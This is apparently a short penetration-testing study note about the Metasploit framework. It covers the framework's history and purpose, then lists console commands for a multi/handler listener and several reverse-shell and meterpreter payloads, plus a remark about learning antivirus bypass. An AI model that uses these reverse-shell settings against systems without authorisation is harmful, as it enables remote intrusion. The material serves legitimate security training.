The Metasploit framework is an open source exploitation framework, originally written in Perl and later rewritten in Ruby. It was acquired by Rapid7, in 2009, and is actively maintained and supported.

It was designed to streamline and enhance the penetration testing process. It does this by offering compartmentalized functionality in the form of modules based on various phases of the penetration testing methodology.

Metasploit can be used in almost every stage of the penetration testing life cycle, from information gathering to exploitation and privilege escalation. This robust functionality is what makes Metasploit an essential framework to learn for any penetration tester.

** Metasploit is extendable, always being updated, and relevant. In real engagements most AV solutions will easily spot meterpreter payloads. Also learn about bypassing AV.**


Start Metasploit:


Set multi handler module:

use exploit/multi/handler

Set up a shell:

set payload windows/x64/shell/reverse_tcp
set payload windows/shell/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set payload linux/x64/shell/reverse_tcp
set payload linux/x86/shell/reverse_tcp
set payload java/jsp_shell_reverse_tcp

Set options:

set LHOST <IP address attack machine>